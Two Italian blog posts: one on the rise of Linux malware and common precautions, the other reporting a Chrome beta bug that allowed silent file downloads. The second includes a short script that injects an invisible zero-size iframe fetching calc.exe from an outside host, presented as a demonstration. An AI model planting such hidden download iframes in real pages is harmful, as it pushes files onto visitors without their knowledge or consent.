Jackyaway

Il senso di sicurezza generale che circonda il mondo GNU/Linux forse dovrà essere rivisto. In molti infatti sono convinti che non esistano virus per il sistema operativo col pinguino. Sembra invece che il numero di programmi maligni per Linux sia in netto aumento: solo nel 2005 è addirittura duplicato passando da 422 a 863 differenti malware.

Secondo gli esperti di sicurezza Linux ha meno virus perché è meno interessante dal punto di vista dei possibili utenti colpiti, parlano le cifre, ~90.66% Windows contro ~0.93% GNU/Linux. Ma il numero di utilizzatori del sistema operativo open source è in netto aumento e con esso anche il numero dei male intenzionati che realizzano applicativi dannosi. Abbiamo sentito dire parecchie volte da nuovi utenti frasi del tipo: “A me non serve un antivirus, uso Linux” oppure “Non esiste alcun modo per infettare Linux”.

Anche se non raggiungerà mai le spaventose cifre di Windows anche Linux ha la sua quota di virus, trojan e worm ma basta prendere delle precauzioni per ridurre drasticamente la possibilità di infezione. Senza i privilegi di root è molto difficile effettuare un attacco al sistema operativo, a meno che non sia in atto una “scalata dei privilegi“, quindi si consiglia comunque l’utilizzo di una password complessa e magari di un buon antivirus e firewall quali misure di sicurezza comuni per chi decide di avvicinarsi a SO GNU/Linux.

Via | LinuxHaxor | OssBlog

Google Chrome, la moda del momento, per chi ancora non sapesse cosa sia, è il browser (beta) di casa Google.

Sul web si trovano centinaia di articoli che ne esaltano velocità e interfaccia grafica, articoli che spiegano come installarlo su Linux tramite Wine, c’è chi addirittura dice sia migliore di Firefox (mah!!! IHMO). In pochi, però, parlano della sicurezza di questo nuovo browser ancora in fase beta.

E’ proprio la sicurezza il nodo dolente di Chrome, esiste infatti un bug che permetterebbe ad un sito malintenzionato di scaricare un file sul nostro computer senza chiedercene l’autorizzazione!

E’ possibile provare quanto detto (io ancora non l’ho fatto) scrivendo sul nostro sito uno script simile a questo

<script>
document.write(’<iframe src=”http://www.dragonjar.org/calc.exe” 
frameborder=”0″ width=”0″ height=”0″>’);
</script>

Quando l’utente visualizzerà il sito, a sua insaputa inizierà a scaricare il file indicato.

Speriamo che Google provveda velocemente a correggere questa falla!